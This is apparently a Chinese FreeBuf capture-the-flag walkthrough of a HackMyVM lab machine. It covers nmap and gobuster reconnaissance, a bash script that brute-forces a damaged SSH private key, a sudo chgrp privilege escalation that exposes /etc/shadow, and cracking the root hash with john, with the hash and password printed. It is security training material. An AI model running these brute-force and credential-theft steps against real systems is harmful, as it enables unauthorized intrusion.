官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
知非- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
本文由
知非 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
前言
本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
信息收集阶段
靶机:192.168.1.128
Kali攻击机:未知
目标:user权限和root权限
nmap -sn 192.168.1.0/24
nmap -A -p1-65535 192.168.1.3
开启了22端口和80端口:
漏洞利用阶段
访问下80端口:
查看源代码:有个css!!
啥也没有?
扫个目录看一下:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.3 -x txt,php,html,zip,log
得出一下连接!
http://192.168.1.3/sshnote.txt
My RSA key is messed up, it looks like 3 capital letters have been replaced by stars.
Can you try to fix it?
sophie
我们RSA值乱了,它看起来3个大写字母已经被*替换了,你能修复它吗?
sophie(还给了个用户名?!)
然后RSA哪里找?!
访问首页:
我们把他BASE64解密:
cG9pc29uZWRnaWZ0LnR4dA%3D%3D
cG9pc29uZWRnaWZ0LnR4dA==
poisonedgift.txt
访问下:http://192.168.1.3/poisonedgift.txt
果然是密钥,还有三个星号,是三个大写字母!
首先,我们生成一个由三个大写字母组成的字典:
crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ > capital.txt
接着,我们新建了脚本,让整个爆破过程自动化进行!
mkdir keysdir
wget http://192.168.1.3/poisonedgift.txt
vi run.sh
#!/bin/bash
key=poisonedgift.txt
keys=keysdir
dict=capital.txt
for i in $(cat $dict); do
echo $i
sed "s/\*\*\*/$i/" $key > $keys/$i.rsa
clear
done;
cd keysdir
chmod 600 *
for k in $(ls -1 *); do
echo $k
ssh -i $k sophie@192.168.1.3 2>/dev/null
clear
done;
已成功登录:
第一个flag:
cat user.txt
a99ac90***********46511852
权限提升阶段
接着需要提权到root!!!
sudo -l一下:
可以使用root权限执行chgrp文件,chgrp可以变更文件或目录的所属群组,我们将/etc/shadow文件添加到sophie组里面
sudo chgrp sophie /etc/shadow
添加后打开shadow文件查看内容,并爆破密码!
cat /etc/shadow
攻击机上创建文件,将root用户的信息放到其中,再用john爆破!
vi pass
$1$root$dZ6JC474uVpAeG8g0oh/7.
密码:barbarita
最后的flag:
cat /root/root.txt
bf3b0**********************2510aea2
已在FreeBuf发表 125 篇文章
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
hackmyvm靶场实战
- 125 文章数
- 40 关注者